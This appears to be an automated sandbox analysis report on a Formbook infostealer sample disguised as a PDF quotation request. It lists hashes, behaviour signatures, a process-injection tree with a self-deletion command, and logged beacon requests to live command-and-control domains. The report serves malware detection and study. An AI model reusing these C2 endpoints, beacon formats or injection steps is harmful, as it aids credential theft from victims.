Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/01/2025, 11:47 UTC

General

  • Target

    RFQ PC25-1301 Product Specifications_PDF.exe

  • Size

    1.7MB

  • MD5

    01b5875dce3957e3aa4a407551e2c4ba

  • SHA1

    96e0fb3b858c9f28445955b8cee19e698d44f815

  • SHA256

    fe242ebf2305cc96041ef027f7cdad6efe3ba1cf3aab07bb37357359452205d4

  • SHA512

    c00aa40db746e6074d0bbad6c14dc840b32e53c12a484405c7b95912bcf056eb47b3fc7b110beb57d1a8e6c9f90e480a55a7be930d2ca2caf03fec6f31e06f7f

  • SSDEEP

    24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8at6FWvjTrmY44PhUY1sooWNf/w:sTvC/MTQYxsWR7aYFWvjTax4Jve

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

hwu6

Decoy

Signatures

  • Formbook

    Formbook is an information-stealing malware family that harvests credentials and other data from the infected host.

  • Formbook family
  • Formbook payload 3 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3524
    • C:\Users\Admin\AppData\Local\Temp\RFQ PC25-1301 Product Specifications_PDF.exe
      "C:\Users\Admin\AppData\Local\Temp\RFQ PC25-1301 Product Specifications_PDF.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\RFQ PC25-1301 Product Specifications_PDF.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:1732
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4360
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\SysWOW64\svchost.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:944

Network

  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    75.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.98.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.98.22.2.in-addr.arpa
    IN PTR
    Response
    7.98.22.2.in-addr.arpa
    IN PTR
    a2-22-98-7.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    166.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    166.190.18.2.in-addr.arpa
    IN PTR
    Response
    166.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-166.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    www.edmaker.online
    Remote address:
    8.8.8.8:53
    Request
    www.edmaker.online
    IN A
    Response
  • flag-us
    DNS
    www.wdgb20.top
    Remote address:
    8.8.8.8:53
    Request
    www.wdgb20.top
    IN A
    Response
    www.wdgb20.top
    IN CNAME
    wdgb20.top
    wdgb20.top
    IN A
    206.119.82.147
  • flag-hk
    GET
    http://www.wdgb20.top/hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP
    Explorer.EXE
    Remote address:
    206.119.82.147:80
    Request
    GET /hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP HTTP/1.1
    Host: www.wdgb20.top
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 16 Jan 2025 11:48:09 GMT
    Content-Type: text/html
    Content-Length: 138
    Connection: close
    ETag: "66ad3670-8a"
  • flag-us
    DNS
    147.82.119.206.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    147.82.119.206.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.rider.vision
    Remote address:
    8.8.8.8:53
    Request
    www.rider.vision
    IN A
    Response
  • flag-us
    DNS
    22.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.suarahati7.xyz
    Remote address:
    8.8.8.8:53
    Request
    www.suarahati7.xyz
    IN A
    Response
    www.suarahati7.xyz
    IN CNAME
    suarahati7.xyz
    suarahati7.xyz
    IN A
    198.252.106.191
  • flag-us
    GET
    http://www.suarahati7.xyz/hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP
    Explorer.EXE
    Remote address:
    198.252.106.191:80
    Request
    GET /hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP HTTP/1.1
    Host: www.suarahati7.xyz
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Thu, 16 Jan 2025 11:48:50 GMT
    server: LiteSpeed
  • flag-us
    DNS
    191.106.252.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    191.106.252.198.in-addr.arpa
    IN PTR
    Response
    191.106.252.198.in-addr.arpa
    IN PTR
    191106252198staticreverse arandomservercom
  • flag-us
    DNS
    www.66sodovna.net
    Remote address:
    8.8.8.8:53
    Request
    www.66sodovna.net
    IN A
    Response
    www.66sodovna.net
    IN A
    104.21.69.218
    www.66sodovna.net
    IN A
    172.67.213.128
  • flag-us
    GET
    http://www.66sodovna.net/hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ
    Explorer.EXE
    Remote address:
    104.21.69.218:80
    Request
    GET /hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ HTTP/1.1
    Host: www.66sodovna.net
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 16 Jan 2025 11:49:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    x-turbo-charged-by: LiteSpeed
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ErgL4HT0TD%2BAdJ1DWYBDKeRcIYG1%2Fb3qBlfuMM4jVdKDv8%2FsWit5aVx45QfJEU0%2FXt2xuL%2F%2F6tTci%2FG6UCzN8c%2BwHrJAFM2zX4ouNi7m1yCKnQ0BjYouqcgz78TDdLpmYgIHuw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 902de167ce7c60f6-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=47514&min_rtt=47514&rtt_var=23757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=170&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    DNS
    218.69.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    218.69.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    3.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    3.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 206.119.82.147:80
    http://www.wdgb20.top/hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP
    http
    Explorer.EXE
    397 B
    474 B
    5
    4

    HTTP Request

    GET http://www.wdgb20.top/hwu6/?FFQLr=Juzs5jjw5zQ9yPWu+ultl5VN84/fIwTmHqqd6b7WcfsFF4kHAenD2xSzHi43vLLQbEsR&oHU=q2JpLLPP00YLwZhP

    HTTP Response

    404
  • 198.252.106.191:80
    http://www.suarahati7.xyz/hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP
    http
    Explorer.EXE
    401 B
    1.2kB
    5
    5

    HTTP Request

    GET http://www.suarahati7.xyz/hwu6/?FFQLr=Qk0i62cYZSUeitg0PxaSe85Uei2U0QFCz/09hMQ/r6oZla20CoFuPY3uWPcJQbT0Hyju&oHU=q2JpLLPP00YLwZhP

    HTTP Response

    404
  • 104.21.69.218:80
    http://www.66sodovna.net/hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ
    http
    Explorer.EXE
    538 B
    2.0kB
    8
    7

    HTTP Request

    GET http://www.66sodovna.net/hwu6/?oHU=q2JpLLPP00YLwZhP&FFQLr=iK23zTJnZxVBDsLzl0iPxrR9FiwOomAN6WSu7UOM3K3trLqJjngnKn+rys81GkWhjVYZ

    HTTP Response

    404
  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    75.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    75.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    7.98.22.2.in-addr.arpa
    dns
    68 B
    129 B
    1
    1

    DNS Request

    7.98.22.2.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    142 B
    157 B
    2
    1

    DNS Request

    13.86.106.20.in-addr.arpa

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    166.190.18.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    166.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    www.edmaker.online
    dns
    64 B
    129 B
    1
    1

    DNS Request

    www.edmaker.online

  • 8.8.8.8:53
    www.wdgb20.top
    dns
    60 B
    90 B
    1
    1

    DNS Request

    www.wdgb20.top

    DNS Response

    206.119.82.147

  • 8.8.8.8:53
    147.82.119.206.in-addr.arpa
    dns
    73 B
    131 B
    1
    1

    DNS Request

    147.82.119.206.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    www.rider.vision
    dns
    62 B
    130 B
    1
    1

    DNS Request

    www.rider.vision

  • 8.8.8.8:53
    22.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    22.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    www.suarahati7.xyz
    dns
    64 B
    94 B
    1
    1

    DNS Request

    www.suarahati7.xyz

    DNS Response

    198.252.106.191

  • 8.8.8.8:53
    191.106.252.198.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    191.106.252.198.in-addr.arpa

  • 8.8.8.8:53
    www.66sodovna.net
    dns
    63 B
    95 B
    1
    1

    DNS Request

    www.66sodovna.net

    DNS Response

    104.21.69.218
    172.67.213.128

  • 8.8.8.8:53
    218.69.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    218.69.21.104.in-addr.arpa

  • 8.8.8.8:53
    3.173.189.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    3.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15


Downloads

  • memory/1476-2-0x0000000000D00000-0x0000000001100000-memory.dmp

    Filesize

    4.0MB

  • memory/1732-6-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1732-3-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1732-4-0x0000000001300000-0x000000000164A000-memory.dmp

    Filesize

    3.3MB

  • memory/1732-7-0x0000000001650000-0x0000000001664000-memory.dmp

    Filesize

    80KB

  • memory/3524-13-0x000000000AB30000-0x000000000AC6D000-memory.dmp

    Filesize

    1.2MB

  • memory/3524-8-0x000000000AB30000-0x000000000AC6D000-memory.dmp

    Filesize

    1.2MB

  • memory/3524-17-0x0000000008D90000-0x0000000008F04000-memory.dmp

    Filesize

    1.5MB

  • memory/3524-18-0x0000000008D90000-0x0000000008F04000-memory.dmp

    Filesize

    1.5MB

  • memory/3524-20-0x0000000008D90000-0x0000000008F04000-memory.dmp

    Filesize

    1.5MB

  • memory/4360-9-0x00000000003A0000-0x00000000004DA000-memory.dmp

    Filesize

    1.2MB

  • memory/4360-11-0x00000000003A0000-0x00000000004DA000-memory.dmp

    Filesize

    1.2MB

  • memory/4360-12-0x0000000000800000-0x000000000082F000-memory.dmp

    Filesize

    188KB
